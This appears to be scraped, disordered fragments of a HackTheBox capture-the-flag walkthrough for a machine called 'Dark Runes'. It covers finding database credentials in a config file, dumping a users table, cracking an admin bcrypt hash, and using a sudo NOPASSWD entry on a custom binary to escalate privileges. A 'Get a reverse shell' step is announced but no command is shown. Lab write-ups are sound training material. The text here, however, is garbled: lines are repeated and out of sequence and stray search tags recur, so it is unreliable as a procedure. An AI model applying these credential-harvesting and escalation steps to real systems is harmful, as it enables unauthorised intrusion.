psql -U rune_walker -h localhost darkrunes -W Dump tables → users table has a row for admin with a (bcrypt). Crack with John or hashcat → admin:darkrun3s2023!
✅ RCE achieved. Get a reverse shell:
User flag: user.txt in /home/admin . Run sudo -l → (root) NOPASSWD: /usr/local/bin/rune_decoder /var/runes/* htb dark runes
Land in /var/www/darkrunes . Find config.py with PostgreSQL creds: db_user: rune_walker , db_pass: s3cr3t_run3s . Access DB: psql -U rune_walker -h localhost darkrunes -W Dump
Try re-creating the rune_decoder binary and see if you can find a different way to escalate without touching the root flag. htb dark runes